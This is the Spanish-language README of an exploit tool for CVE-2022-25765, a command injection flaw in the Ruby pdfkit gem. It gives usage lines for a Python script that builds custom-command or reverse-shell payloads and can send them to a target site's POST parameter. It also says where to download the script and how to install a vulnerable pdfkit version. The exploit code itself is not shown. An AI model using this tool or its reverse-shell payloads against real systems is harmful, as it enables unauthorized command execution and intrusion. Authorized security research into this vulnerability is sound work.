
Exploit para CVE-2022–25765 (pdfkit) - Inyección de comandos

¿Te gusta este repositorio? ¡Danos una ⭐!
Solo con fines educativos y de investigación de seguridad autorizada.
@UNICORDev por (@NicPWNs y @Dev-Yeoj)
El paquete pdfkit desde 0.0.0 es vulnerable a Inyección de Comandos donde la URL no está correctamente saneada.
Una gema de Ruby pdfkit se usa comúnmente para convertir sitios web o HTML a documentos PDF. Las versiones vulnerables (< 0.8.7.2) de este software pueden recibir una URL especialmente diseñada que contiene un comando que se ejecutará. Este exploit genera URLs ejecutables o las envía a un sitio web vulnerable que ejecuta pdfkit.
python3 exploit-CVE-2022–25765.py -c <command>
python3 exploit-CVE-2022–25765.py -s <local-IP> <local-port>
python3 exploit-CVE-2022–25765.py -c <command> [-w <http://target.com/index.html> -p <parameter>]
python3 exploit-CVE-2022–25765.py -s <local-IP> <local-port> [-w <http://target.com/index.html> -p <parameter>]
python3 exploit-CVE-2022–25765.py -h
-c Modo de comando personalizado. Proporciona un comando para generar un payload personalizado.
-s Modo de reverse shell. Proporciona IP y puerto local para generar un payload de reverse shell.
-w URL del sitio web que ejecuta pdfkit vulnerable. (Opcional)
-p Parámetro POST en el sitio web que ejecuta pdfkit vulnerable. (Opcional)
-h Muestra este menú de ayuda.
Descargar exploit-CVE-2022-25765.py desde GitHub
Descargar exploit-CVE-2022-25765.py desde ExploitDB
searchsploit -u
searchsploit -m 51293


pdfkit Versión 0.8.6
pdfkit Versiones < 0.8.7.2
gem install pdfkit -v 0.8.6